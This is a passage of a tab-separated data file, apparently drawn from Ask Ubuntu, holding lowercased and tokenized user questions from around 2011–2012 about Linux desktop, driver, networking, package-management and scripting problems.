libgstreamer-plugins-base0.10-0 ( > = 0.10.32 ) but 0.10.32-1ubuntu5 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.32 ) but 0.10.32-3ubuntu3 is to be installed depends : libjasper1 ( > = 1.900.1 ) but 1.900.1-7ubuntu2 is to be installed depends : libmodplug1 but it is not going to be installed depends : libmpcdec6 ( > = 1:0.1~r435 ) but it is not going to be installed depends : libmusicbrainz4c2a ( > = 2.1.5 ) but it is not going to be installed depends : libofa0 ( > = 0.9.3 ) but it is not going to be installed depends : liborc-0.4-0 ( > = 1:0.4.10 ) but 1:0.4.11-2 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.44-1ubuntu3 is to be installed depends : librsvg2-2 ( > = 2.26.0 ) but 2.32.1-0ubuntu3 is to be installed depends : librtmp0 ( > = 2.3 ) but 2.3-2 is to be installed depends : libschroedinger-1.0-0 ( > = 1.0.9 ) but it is not going to be installed depends : libsndfile1 ( > = 1.0.20 ) but 1.0.23-1build1 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.5.2-8ubuntu4 is to be installed depends : libvpx0 ( > = 0.9.0 ) but it is not going to be installed gstreamer0.10-plugins-ugly : depends : libc6 ( > = 2.7 ) but 2.13-0ubuntu13 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.5.2-8ubuntu4 is to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.28.6-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.26 ) but 0.10.32-1ubuntu5 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.26 ) but 0.10.32-3ubuntu3 is to be installed depends : libid3tag0 ( > = 0.15.1b ) but it is not going to be installed depends : libmad0 ( > = 0.15.1b-3 ) but it is not going to be installed depends : liborc-0.4-0 ( > = 1:0.4.10 ) but 1:0.4.11-2 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.5.2-8ubuntu4 is to be installed
101828	`` no system tray detected on this system . ''	`` no system tray detected on this system . '' appears starting gnome and cinnamon in oneiric 11.10 ; starting with gnome classic and unity no problem at all . how to solve ?
101829	why is x11 a security risk in servers ?	i remember reading that servers do not have a gui because x11 is a security risk . why ?
101831	dual monitor with high resolution	i got some trouble with my dual monitor setup . my monitors : iiyama 22 '' 1680x1050 samsung syncmaster ta350 24 '' 1920x1080 my graphics card is an amd radeon 5750 and i installed the additional amd driver correctly . i used to have the iiyama and another 19 '' ( 1280x1024 ) monitor , both connected via dvi and everything worked well . so now , i bought a samsung 24 '' monitor , connected it via dsub and ubuntu says that the resolution is too high . so i changed the virtual screen resolution to 3600x1080 in xorg.conf but after a reboot i had to detach my new monitor - only the 22 '' iiyama works . how can i get my samsung ( and my dual monitor setup ) to work ? thx for help ! : )
101838	no page number in first page	i am writing a document and it is required that the first page ( title page ) has no page number and the second page starts with page 2 . i do n't know how to remove the footed only in page 1 and leaving the footer in the rest of the pages as is . can anyone maybe help ? many thanks
101842	storing files on cloud	i want to upload some files to the cloud and leave the there to see/use . i do n't want them on my pc as they take up space ( ie no syncing ) if i uncheck sync with local pc , it wo n't let me do anything to cloud folder . i am using ubuntu one thanks
101847	how can i monitor dvr cameras ?	i have a dvr installed and works great ... i have the ip address and when i write it in ie9 works perfect ( via web service ) ... how can i monitor them via web ? i tried with every browser at ubuntu software center and i ca n't see them = ( ... ( i can enter to the dvr , but the interface is just a shame )
101852	zentyal internet load sharing . how to avoid it	we have configured zentyal as our gateway . but the internet speed is shared equally among all the machines . even when no machine is downloading anything . what i mean by this is if i have 10 machines and a 10mbps line , each machine is maximum getting 1mbps download speed , even when other machines are down . i came to this conclusion , by checking the download speeds by directly connecting to my isp and connecting to my isp through zentyal .
101855	what processes should be ioniced for a responsive desktop ?	my goal is to intelligently and permanently ionice the processes on my desktop for responsiveness under heavy disk and network load . by permanently , i mean that any changes made to the system will persist across reboots . i want to eliminate situations where i ca n't move a window because disk bandwidth is saturated by a process that is n't in anyway serving my gui . there are hundreds of processes running on my system . which ones could be run with class idle and which ones with class real time ? is it a good idea to set the x and gnome-shell processes to class real time ? how about setting cupsd , avahi-daemon , gnome-screensaver , deluge , ntpd and backintime to class idle ? here 's a list of the currently running processes on my system .
101856	no wlan0 found with a broadcom 4313	i 've installed ubuntu 11.10 on an asus 1015pn netbook with 2 gigabytes memory using wubi . got a broadcom 4313 chipset ( 14e4:4727 ) . i wanted to connect my netbook to my mobile using joikuspot premium and i was able to scan and find the wireless ap but was n't able to obtain an ip so i set a static ip and disabled ipv6 without any luck . then after reading a post i installed the broadcom wireless source , common and the firmware ( brcmwl-kernel-source ) using synaptic . after uninstalling the previous brcm sta driver which was downloaded form here . after rebooting the system i did a iwconfig and was not able to find the wlan0 interface which was there before , so i removed the drivers that i installed and reinstalled the old broadcom sta from their site , however i am still not able to find the interface but ubuntu recognizes my wlan card when i do a lspci . how do i get wlan0 back ?
101858	is there a way to play an .mp3 file without opening a banshee window ?	i want to play an .mp3 file without banshee opening , it will just start on the top bar in the sound icon . for the record i am using ubuntu 11.10
101866	how do i enable sli on an alienware m9750 ?	i have a alienware m9750 with dual 7950 gtx go 's . i have ubuntu 11.10 installed.. i installed the newest drivers , and had no issues with just installing the drivers ... i went to terminal and did sudo nvidia-xconfig -- sli=on reboot once doing this and reboot came ... i saw the nvidia logo splash screen ( not sure if i was supposed to ) then the system continually would try to load into ubuntu gui ... and then just show some of the processes ( text ) and then just show nvidia splash screen and continually do this ... never showing the gui . i had to reinstall to get it working again . i tried to boot to recovery mode and edit the xorg.conf file , but kept saying read only , and would n't let me change it . any help would be nice thanks
101881	ssh daemon does not autostart	i use a vps with ubuntu 10.04 . after i performed `` apt-get upgrade '' , the ssh daemon stopped working and does not automatically start when i restart my server . i have only access to files ( edit , create delete etc . ) and no shell access . could you please help me out with setting up ssh daemon autostart ? thank you very much .
101882	should i be using a firewall in ubuntu ?	i installed both gufw and firestarter but i 'm hesitant to activate one of them because i do n't know too much about firewalls in general and i do n't want to srew up vpn or p2p .
101885	which software can i use to extract an audio track from a video ?	i used virtualdubmod on windows to pull off the sound from a video file . what software could do the same on ubuntu ? thanks .
101888	best approach to automatically processing .csv -- > mysql	bump this to the proper place if necessary . not sure where i can get the best response . i need to create a reporting application and would like to do it with ubuntu if possible . the originating data comes from an appliance based application that can periodically ftp a delimited log file to a designated location . i would like to develop a mechanism to use that data to update a mysql database ( to be created ) that will be used for building scheduled reports that are eventually emailed to various distribution groups ( either as pdfs of excel formatted ) . we have the internal smarts to create the various mysql queries ( and to design the database ) but do n't have the linux/ubuntu know how to determine the best approach . we are doing something similar for another application on the windows side using crystal reports , but given the need to distribute this application , would love to not have to deal with windows licensing costs etc ... i need advise on the proper tools/approach , but also recommendation of where i might be able to find qualified resources who can do this effectively without significant cost .
101894	icedtea plugin fails to install	i was performing a normal update ( ubuntu 10.10 , 64 bit ) , and the software update failed . software center throws the error `` items can not be installed ... want to repair '' ? i press repair button , and then the error `` package operation failed '' . i looked around on the net and found a couple things to try : **sudo apt-get install -f** reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : icedtea6-plugin 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 283kb disk space will be freed . do you want to continue [ y/n ] ? **y** ( reading database ... 211397 files and directories currently installed . ) removing icedtea6-plugin ... update-alternatives : unknown argument ` -- quiet' usage : update-alternatives -- install < link > < name > < path > < priority > update-alternatives -- remove < name > < path > update-alternatives -- help < link > is the link pointing to the provided path ( ie . /usr/bin/foo ) . < name > is the name in /usr/lib/opkg/alternatives/alternatives ( ie . foo ) < path > is the name referred to ( ie . /usr/bin/foo-extra-spiffy ) < priority > is an integer ; options with higher numbers are chosen . dpkg : error processing icedtea6-plugin ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : icedtea6-plugin e : sub-process /usr/bin/dpkg returned an error code ( 1 ) **sudo dpkg -- configure -a** **sudo apt-get update & & sudo apt-get upgrade** mikew-mbu : ~ $ sudo apt-get update & & sudo apt-get upgrade hit http : //www.scootersoftware.com stable release.gpg ign http : //www.scootersoftware.com/ stable/non-free translation-en ign http : //www.scootersoftware.com/ stable/non-free translation-en_us hit http : //www.scootersoftware.com stable release ign http : //www.scootersoftware.com stable/non-free amd64 packages ign http : //www.scootersoftware.com stable/non-free amd64 packages hit http : //www.scootersoftware.com stable/non-free amd64 packages hit http : //us.archive.ubuntu.com maverick release.gpg ign http : //us.archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //us.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_us hit http : //security.ubuntu.com maverick-security release.gpg ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en ign http : //security.ubuntu.com/ubuntu/ maverick-security/universe translation-en_us hit http : //us.archive.ubuntu.com maverick release hit http : //security.ubuntu.com maverick-security release hit http : //us.archive.ubuntu.com maverick/universe sources hit http : //security.ubuntu.com maverick-security/universe sources hit http : //us.archive.ubuntu.com maverick/universe amd64 packages hit http : //security.ubuntu.com maverick-security/universe amd64 packages reading package lists ... done reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : icedtea6-plugin : depends : openjdk-6-jre ( = 6b20-1.9.10-0ubuntu1~10.10.2 ) but 6b20-1.9.10-0ubuntu1~10.10.3 is installed e : unmet dependencies . try using -f. **sudo apt-get clean** **sudo apt-get install -f** ( same error as above ) i can see that a dependency on openjdk is broken , but i 'm not sure what to do next to actually fix the issue . i need to install other software on my machine , and this is holding me back . any ideas ? mike
101895	i can not see the files in some folders . how can i access them ?	i am totally new to ubuntu so please excuse me for my ignorance . i 've just installed ubuntu on my windows vista laptop ( to another partition ) . i have an separate partition were i 've stored my data files ( directory etc. ) . i can successfully see the folders in that directory but not actually the files within them . i know that these directories are not empty . edit : i would like to clarify my question . i have 3 partitions . a : ms vista , b : ubuntu , c : mydata while i am in vista i can access everything in c : mydata . however , in ubuntu despite that i can see and navigate in folder structure of c : mydata ( eg , pictures , movies , documents etc ) all folders appears empty . i 've tried to go to view ( hidden / unhidden ) files but it not works : ( what is the problem ?
101897	how do i install alfresco ( enterprise content management software )	give me some steps to install the alfresco on ubuntu 10.10 . i am new to ubuntu so please give me some guide to install the alfesco on ubuntu system
101899	how to manually power-on the webcam ?	i have a clevo laptop with a built in webcam , on the keyboard there 's a helpful fn+f10 hotkey that seems to power the device on and off . i 'd like to have some control over the webcam without needing to trigger the hotkey , but i 'm not certain on where i need to look to find what it 's triggering . do i need to look at the xorg keymaps ? or the udev rules ? or something in acpi ? i 've tried digging around in all three and i 've yet to find anything massively relevant .
101904	can not ssh/sftp to remote server without using another remote server	i can access a server a with ssh , and from there i can access server b , but i ca n't access b directly . is it possible to open a nautilus folder in server b by clicking in places â connect to server ?
101906	gnome-tweak-tool does n't start due to `` importerror : no module named gi '' error	i am using ubuntu 11.10 with gnome shell and have a problem with gnome-tweak-tool . when i click on it , it does nothing and when i try to open with terminal it gives this error : traceback ( most recent call last ) : file `` /usr/bin/gnome-tweak-tool '' , line 22 , in < module > import gi importerror : no module named gi i googled a bit , found some solutions ( reinstalled some python-gobject packages ) , but still did n't help./
101908	how can i remove the boot flag from a non ext drive ?	i 've accidentally set an ntfs drive with a boot flag during a recent re-installation of xubuntu 11.10 , how can i undo that without deleting the partition ?
101914	openvpn bridge client on ubuntu 11.10 does n't work	i 'm trying to set up my desktop running ubuntu 11.10 to connect to my openvpn server in bridge mode . i have my client configuration file set up like so : remote [ omitted ] 1194 client dev tap0 proto tcp resolv-retry infinite nobind persist-key float ca [ omitted ] cert [ omitted ] key [ omitted ] ns-cert-type server using this exact same config file ( except for the cert and key which are all signed by the same ca ) i 'm able to connect fine on my windows machines . on my ubuntu machine , it seems to work fine , as i get this output when running openvpn : mon feb 6 11:15:36 2012 attempting to establish tcp connection with [ af_inet ] ... :1194 [ nonblock ] mon feb 6 11:15:37 2012 tcp connection established with [ af_inet ] ... :1194 mon feb 6 11:15:37 2012 tcpv4_client link local : [ undef ] mon feb 6 11:15:37 2012 tcpv4_client link remote : [ af_inet ] ... :1194 mon feb 6 11:15:38 2012 [ leigh-gateway ] peer connection initiated with [ af_inet ] ... :1194 mon feb 6 11:15:40 2012 tun/tap device tap0 opened mon feb 6 11:15:40 2012 initialization sequence completed however , i 'm unable to connect to any of the bridged lan devices after the vpn connection seemingly to have successfully completed . running ifconfig seems to indicate that the tap0 interface does n't exist . am i missing something here ? is there something extra i need to do after initiating the openvpn connection to configure the bridge interface ? thanks .
101917	run default mail client	to run the default web browser or terminal there are commands like x-www-browser and x-terminal-emulator . there are other alternatives for common programs . is there a similar command to run the default email client ? as an alternative , is there a way to execute the mailto protocol handler ?
101918	how to get logitech c510 webcam working in cheese/skype	i have a logitech c510 webcam connected to my desktop running 64-bit ubuntu 11.10 , but it does n't seem to be working when i run cheese and skype . after doing some search , it seems this webcam should just work out of the box . however , cheese and skype do n't seem to work with it . with those programs loaded , the webcam appears in the list of video devices in their configurations , but the orange light indicator on the webcam does not turn on . however , i was able to get the webcam to work with the adobe flash plugin running in chromium . i can open flash settings and click on the webcam icon to get an image to show up . so the webcam seems to work fine , but cheese and skype ca n't seem to operate it . any ideas about what might be causing this ? thanks .
101931	restoring all data and dependencies from dpkg -- set-selections '* '	so i can run on one machine : dpkg -- get-selections '* ' > selection.txt on another machine : dpkg -- set-selections < selection.txt ... followed by either of the following : aptitude install apt-get -u dselect-upgrade ... to install the packages that . however , it appears that some information gets lost in the process , such as whether a package ( say xyz ) got installed automatically as dependency of another package ( abc ) . you can see that whenever you do something like apt-get -- purge remove abc . on the original machine you would be notified that package xyz was installed as dependency of abc and that you may use apt-get autoremove to get rid of it . now i am aware of deborphan and debfoster , but they 're cumbersome to use given the ( simple ) task at hand . it seems saving and restoring the selections as shown above is not sufficient to restore the subtle dependencies of installed packages . is there a way to back up the complete set of metadata for package management and restore it then in its entirety ?
101945	wireless usb - d-link dwa-125 , constant authentication required . ubuntu 10.10	i installed ubuntu 10.10 desktop clean install on a hard drive . i then plugged in my d-link dwa-125 , and it immediately picked up my home network . so i click connect , and after a while , it asks for authentication , i put in the correct details ( i know they 're correct for a fact since the other pc 's ( windows ) connect just fine to the network ) . thing is , it does n't connect . it just has that wireless connection icon going up and down , ( i think it 's trying to connect ? ) , and then after a while , it asks for authentication again . it 's never making the connection , it 's like it 's in an authentication loop . what is the problem ? the fact that the device even works and picks up the network is not a sign of no driver installed ? i read on here went to my wireless usb , the dwa-125 . https : //help.ubuntu.com/community/hardwaresupportcomponentswirelessnetworkcardsdlink and it says : download , compile and install the native driver from source . reportedly does not support wpa2 . installing windows drivers ( via ndiswrapper ) reportedly fails . 2011-04-18 ( ubuntu 10.04 ) that is for ubuntu 10.04 , and i 'm obviously running 10.10 . my wireless router is a d-link as well and the security types are as follows : network authentication : shared wep encryption : enabled wep encryption strength : 128 and the key .
101947	ubuntu system time is slow/behind	i am running ubuntu 11.04 on my fujitsu siemens amilo pro laptop . the system clock keeps on falling behind . i set it to the correct time , but it slows down and speeds up sporadically . can i fix this ? if not , why is it happening ?
101948	command line flag for mplayer to use hardware acceleration ?	i can make vlc use hardware decoding with vlc -- ffmpeg-hw video.mkv is there an equivalent flag for mplayer ?
101949	itunes does n't run properly	after installing itunes i noticed that the layout was not the proper one . how can i get itunes working on ubuntu ?
101950	asterisk not playing custom sounds on ubuntu server 11.04	i 've installed asterisk on my ubuntu server , all works fine , excepts playing the custom sounds . asterisk sounds work , but this file i 've uploaded does not play ( on other servers it works , it is a .wav pcm 16bit 8000 ) . here is some log output : [ feb 6 22:55:45 ] warning [ 11045 ] file.c : file custom/sohoitsoluciones does not exist in any format [ feb 6 22:55:45 ] warning [ 11045 ] file.c : unable to open custom/sohoitsoluciones ( format 0x4 ( ulaw ) ) : no such file or directory [ feb 6 22:55:45 ] warning [ 11045 ] app_playback.c : ast_streamfile failed on sip/out4903-0000001d for custom/sohoitsoluciones how can i get asterisk to play a custom sound ?
101951	adsl device name in linux	how to find out device name ( adsl modem connected via ethernet ) in linux/ubuntu ? the name is required for using tcpdump , the connection is active and was created in ui .
101953	how to configure conky to be on one specific viewport/desktop ?	i would like conky to only show up on one viewport/desktop . i did use the gnome feature to predefine viewports for specific window classes , but this feature does not work for conky . even moving it manually to another viewport does not work , because it jumps back to the first viewport , as it refreshes . so ... is it possible to configure conky to define the viewport it is displayed on ?
101955	`` e : the list of sources could not be read . '' while trying to update	when i try to update , i get this : root @ deepit-r405-a-cpd6a2 : /var/lib/apt # sudo apt-get update e : type '123443215 ' is not known on line 61 in source list /etc/apt/sources.list e : the list of sources could not be read . any idea what i can do ?
101961	installation hangs during boot on new computer	i wanted to install ubuntu 11.10 on my new pc . but liveusb hangs on boot ( stops at line x initrd memory freed ; if i press enter it writes some more lines and hangs again , this time completely ) . tried also livecd , ubuntu 12.04 alpha , fedora 15 , rescatux ( debian ) , noapic , nolapic , safe mode and everything wo n't boot . currently i 'm forced to use windows7 . my config : processor amd fx ( tm ) -4100 quad-core ram 8,00 gb graphic gigabyte gv-n56goc-1gi ( nvidia geforce gtx 560 ) mainboard gigabyte ga-870a-usb3 network cards : compact wireless-g usb realtek pcie gbe family controller
101962	script to only execute during first install of a package	i recently started packaging up some of my software and publishing it on launchpad . the installation and removal works fine , but upgrading the package form one version to the next version is problematic . the problem is that there are some scripts that only need to run during the first installation of the package . these scripts populate the db , create a user , etc . they are currently called in the package.postinst configure ) section . however this results in them being called during an upgrade as well as shown in the diagram . is there a way to include a maintainer script in a .deb package that only executes during the first installation of the package and not during an upgrade ? or what would be an elegant way to include some initial setup scripts in a .deb package ?
101963	show current folder size in nautilus	i would like to know if it 's possible to display the current folder size ( in mb or gb ) in nautilus at the status bar . here 's a screenshot : as you can see , ( in this case ) i have 7 items , and i have 125.7 gb left . i would like to display : 7 items , folder size : 412 mb , free space : 125.7 gb is it possible ? if so how ?
101964	how can i display how a website will look in another form factor ?	some websites use different css styles to display on different systems . how can i use those style sheets to show this on another form factor ? for instance , i would like to show how the screen style will look on a laptop .
101965	what is the replacement for gnome-open in gnome ?	gnome-open is typically used to open files from the cli using their associated mime-type handler . it does n't appear to be installed by default anymore in 12.04 . the errata has not been well documented or at least i have yet to find it .
101974	syncing iphone on banshee	on a previous question i have been told to use banshee as a replacement for itunes , which leads me to this question : can i upload movies on my iphone using banshee instead of itunes ?
101976	links wo n't open in dolphin using u1 client on kde	no matter if i click on a link in the ui ( for example , the 'official support ' button ) or the 'show me my ubuntu one folder ' button the ui wo n't open the link/folder using dolphin ( tested on kubuntu oneiric ) .
101977	computer is running slow with ubuntu	why my computer runs too slow when i install ubuntu or any other linux ( debian works better than other distros ) , but with windows works fine ... ? my configuration is : processor : intel celeron cpu 1.70ghz graphics : ati radeon 9250 128 mb hd : western digital 120gb ram : 2gb ddr1 motherboard : msi ( ms-6566 ) is there anything unsuported by ubuntu , or any linux . if so , is there any way to get it work fine ( visual effects are not important to me ) . what do i need to do ?
101978	get multiple screens working in 11.10 : the selected configuration for displays could not be applied	seriously , sometimes i hate ubuntu . i try to get my secondary screen working , but when i enable it i get this error : the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 3280 , 1050 ) , minimum= ( 320 , 200 ) , maximum= ( 1680 , 1680 ) and i know that this question has been asked before , but i still have n't my screen working . the weird thing is that my secundary screen works till i log in . before logging in it works fine . but after logging in my screen becomes black . so i looked around for an answer and i 've tried the following things . sudo amdcccle and tried some setting according to multiple displays replaced /etc/x11/xorg.conf sudo aticonfig -- initial changed /etc/x11/xorg.conf and changed the 'subsection display ' part . only that last method works for me , but only one time . after a reboot this method did n't work out anymore . does someone knows an ultimate way to fix this ? it really frustrates me . thanks in advance .
101980	dual boot windows 7 and ubuntu 11.10	i have 300 gb hard-drive and i already installed windows 7 on 35 gb partition + 100 mb for its boot files now i want to partition my hard-drive for ubuntu is this table ok ? 10 gb for / 60 gb for /home 3 gb for swap 256 mb for /boot and rest for data partition to store my movies , pictures , music etc . ( i do n't want much space for multimedia files on ubuntu partition since i 'll be using shared partition for that files . ) can you tell me how to achieve this ? which software should i use to partition my hard drive ? which partitions should be primary and which should be logical ? where should i install grub ? thanks .
101983	ubuntu + xfce + the albatross theme	i like the look of this theme : http : //shimmerproject.org/project/albatross/ but i ca n't figure out how to get xfce to look like this . help !
101993	need some help - no wireless access from ubuntu , but do get wireles access with xp on the same machine	got a desktop with xp and ubuntu . new to linux , have some knowledge of vi and unix . the xp wireless works , ubuntu wireless does not , get - hardblocked : yes . its an old medion desktop , motherboard ms-7091 , the wireless is on an internal usb . ( its got a wired link thats never worked , and never investigated that as did okay with xp and wireless . ) investigating 3 possible ways around the wireless block : - 1. unblocking the hard block . 2. updating the linux wireless driver - rt2500usb via the command line 3 . replacing the linux wireless driver with windows driver using ndiswrapper was trying to get ndiswrapper through the gui off the installation disk but after double clicking ndiswrapper the install option was disabled , so looking at command line install of ndiswrapper . not so hot on using linux and ndiswrapper , tar , installing drivers etc ... so any help appreciated
101996	named pipe getting `` clogged ''	for elem in { 1..99 } ; do echo $ elem > mypipe ; done this piece of bash code should pass 99 ints through the pipe , which previously , in another terminal had this set : cat < mypipe does anyone know why i 'm sometimes only getting a random ( less than 99 ) number of ints passed through the pipe , after which it hangs ? i have to terminate the script with ctrl+c , and i get this message : bash : mypipe : interrupted system call i am running ubuntu 11.10 .
102000	'apt-get ' always fails with error 404 : not found over a package ( flashplugin-downloader )	the following error is preventing me from installing anything on xubuntu 11.10 . how can i fix it ? ? $ sudo apt-get install meld reading package lists ... done building dependency tree reading state information ... done meld is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up flashplugin-downloader ( 11.0.1.152ubuntu1 ) ... downloading ... -- 2012-02-06 21:23:36 -- http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.0.1.152.orig.tar.gz resolving archive.canonical.com ... 91.189.88.33 connecting to archive.canonical.com|91.189.88.33|:80 ... connected . http request sent , awaiting response ... 404 not found 2012-02-06 21:23:36 error 404 : not found . download failed the flash plugin is not installed . dpkg : error processing flashplugin-downloader ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : flashplugin-downloader e : sub-process /usr/bin/dpkg returned an error code ( 1 )
102004	horizontal lines in video playback ( all players )	i just installer 11.10 on my brend new machine , which does not have separate graphic card but i have intel i3 2100 and asus p8z68-v lx and everything is fast and i want to watch some movies on my 23 '' ips monitor now , but this horizontal lines ( appearing sometimes , in all video players ) are killing me ? can somebody explain me how to solve the problem ? thanx !
102005	disable networking for specific users	i 'm working on ubuntu/mint distro meant to be ran live . there are multiple accounts that fall into three general groups : admin , internet and security . admin is obviously has the authority to do whatever . internet account is for using the internet . the other accounts are security accounts . under no circumstances is any networking internet , printer , bluetooth , wifi devices , etc , allowed . what i 'd like to do is remove the network drivers from the kernel , but that would disable the accounts that need internet . what are the lowest level way ( s ) to disable internet for these security accounts ? i 'm looking for impossible to connect solutions .
102015	problems after installing ubuntu 11.10	i 'm having trouble with ubuntu 11.10 . it has to do with nomodeset . after i boot into ubuntu , it goes to a purple screen for about 10 seconds and then goes blank . after that nothing happens . i 've read other people 's questions about this and i know it has to do with enabling nomodeset . this worked for me when i was using the livecd mode , but now ubuntu is permanently installed as a dual-boot system . going into recovery mode does n't work , pressing e in the boot loader and writing nomodeset after quiet splash does n't work either . holding shift any time it 's booting does n't work . i do n't know what to do anymore . i have an hp pavilion dv6 laptop with an amd a6-3400m cpu , and my gpu is an amd radeon hd 6520g . i 've never worked with linux before so taking me through this step-by-step would be great . thanks !
102016	how do i prevent java ( icedtea ; openjdk ) from being installed ? and how do i prevent repo reactivation ?	i do not want any java runtime environments installed on my system . i have installed all the software and applications i want installed on my system . yet i keep finding additional stuff gets installed when automatic updates update . i have main ( security and recommended ) and universe updates activated . despite the fact that i have repeatedly disabled restricted and multiverse , they somehow keep getting reactivated . that is , when i got to update manager > settings they have gotten activated again . is there a way to permanently disable restricted and multiverse ? what do i need to do to tell ubuntu to only accept updates for already installed stuff and to not install anything new ? is there a way i can specifically blacklist java from ever being installed ? i 'm assuming this is a massive bug that exists in 11.10 and hopefully 12.04 will fix it . but what can i do in the meantime ?
102017	package error while trying to upgrade mysql-server	i am trying to upgrate mysql 5.1 to version 5.5 since official ubuntu repositories do not provide 5.5 , i 've decided to go with dotdeb repository . when i 've updated the package information and typed in sudo apt-get install mysql-server it removed my mysql 5.1 but does not want to install 5.5 , giving this error : dpkg : error processing /var/cache/apt/archives/mysql-client-5.5_5.5.19-1~dotdeb.1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/mysql ' , which is also in package mysql-client-core-5.1 5.1.54-1ubuntu4 do you have any ideas how i can fix this ?
102023	no sound on gigabyte motherboard	i am using ubuntu 11.10 on a gigabyte ga-ma785gm-udh mobo . i have not had speakers hooked up until recently and now i realized there is no sound . alsa seems to be loaded and the correct output is selected , but still no sound . can you help ?
102024	noise in audio out when charging laptop	i normally use a mini jack cable to connect the audio out of my laptop to my guitar amp to listen to music . when the computer is on battery i have no problem whatsover with the sound quality . however , the second i plug in the charger to the laptop i get a lot of noise in the guitar amp . i have windows 7 on dual boot and this problem does n't happens there , which allows me to conclude that this is software problem of some sort . any idea how to solve it ? thanks .
102031	crashed and cloud access to files	so , something happened to my 11.0 set up and i needed to format and re-install . i am trying to look at the folders i sent to my ubuntu one account that i set up but they do not show on another system i have . no backup folders are shown that i set up and could view form the old machine . i thought that is why i would want to store folders on ubuntu one so i could look at them from another machine and use them as back ups .
102032	how do i add the gnome logo in the corner of the screen ?	i miss the old gnome foot in the top left corner of the screen ( missing in first photo , present in the second ) - how can i put it back ?
102035	kde 4.8 started to open new windows in a `` grid mode '' ?	i do n't know how , but i appear to have toggled some option that causes kde to open new windows in a grid mode , and i do n't have any idea for how to fix this ... has anybody seen this before ? how can i change this back ?
102036	installation of driver failed	it says `` please have a look at the log file for details : /var/log/jockey.log '' and i have no idea where to find this so called file .
102037	is lamp strictly for development purposes ?	so basically , is lamp strictly for development purposes or is it fine for production websites as well ? i ask this because i have recently switched to ubuntu from windows and if lamp is anything like wanp , it is more aimed towards development than production ( live ) websites . does the same apply for lamp ? i wish to run a small website on ubuntu and i 'm wondering if lamp is secure enough .
102044	will precise include an option to move the unity launcher ?	given that the community has created functionality to move the unity launcher to the bottom of the screen , my question is whether or not canonical will implement this in the default installation of ubuntu . originally , i know this was n't intended , as mark had said he wanted the launcher close to the ubuntu button , but now that the ubuntu button is on the launcher , have the ux issues surrounding this been resolved ?
102045	how do i select a root file system when partitioning ?	i want to install ubuntu on the c : partition where my windows 7 is , simply to replace the systems . i 've also tried to install it on another partition ( without formating it ) , which failed ! all i get is : no root file system is defined . please correct this from the partitioning menu . i want to install ubuntu without formatting any of my partitions . is that possible ?
102046	is it okay to delete ~/.cache ?	when i use disk usage analyzer and scan my home folder .cache always shows up with a decent bit of things in it . would it be okay for me to delete the contents of this folder or would it damage something ?
102054	how do i unlock `` /var/lib/apt/lists/ '' ?	i was installing an item using package manager when it froze . i used alt + f2 to close it . afterwards , whenever i try to install anything via apt-get , the terminal reads : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ how do i unlock /var/lib/apt/lists/ ?
102057	view ubuntu one files from another computer	i have set up an account and uploaded folders form my main machine . i can view these folders/files from that machine just fine . from another machine i log onto my ubuntu one account and can not see those files . i get a message saying : the remote application did not send a reply . i do n't want these files/folders sync 'd i just want access to my files/folders from any machine i am on . as if i am using a friends system i do n't want my files/folders sync 'd to their machine . any ideas on what i am doing wrong ? i am using ubuntu 11.10 .
102060	crontab output problem	i have this script . when i run it from the command line , it works fine . when i run it from cron , it only prints out half of the data the results should look like this : 07/feb/2012 11 0.5 07/feb/2012 11 0.333333 07/feb/2012 11 0.3 currently i 'm getting just the date data when i run it from cron : 07/feb/2012 11 07/feb/2012 11 07/feb/2012 11 07/feb/2012 11 this is the script : # ! /bin/bash # path=/opt/someapp/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/bin/awk # generate data and hour stamp date '+ % d/ % b/ % y % h ' > /var/www/stats/datedata # crank out and consider utlisation /usr/bin/./top -d 3 -n3 | /bin/./grep `` cpu '' | awk ' { sum += $ 2/3 } end { print sum } ' > /var/www/stats/usage_cpu # /usr/bin/./paste /var/www/stats/datedata /var/www/stats/usage_cpu > > /var/www/stats/thedata this is my crontab entry : ( i 'm using /etc/crontab to set this up ) 20 * * * * root /var/www/stats/./stats.sh
102061	root script execution at non-root user login/logout	a script that requires root privileges needs to be executed when a non-root privileged user signs in/out . how do i handle this ?
102068	connecting to an ubuntu server using ethernet cables but no internet connection	i administer about 6 computers at a school . the computers are very old -- they used to be running windows 98 -- but they are still usable and are now running ubuntu . i also have 2 more modern computers running windows xp . i am trying to run scratch on these computers , which i currently have accomplished . the problem is , these computers constantly break down and need to be replaced . the it of the school does n't allow them to be connected to the internet , but i want to share files between these computers so that the files are stored in one place . ideally , if one computer has to been replaced , there wo n't be missing files . dropbox is n't an option because it required internet . is there a way to have the 4 ubuntu computers , and the 2 windows xp computers ( none have internet ) to connect to a computer running ubuntu server just by ethernet cables ? each computer would have its own dedicated ethernet cable connecting it to the server .
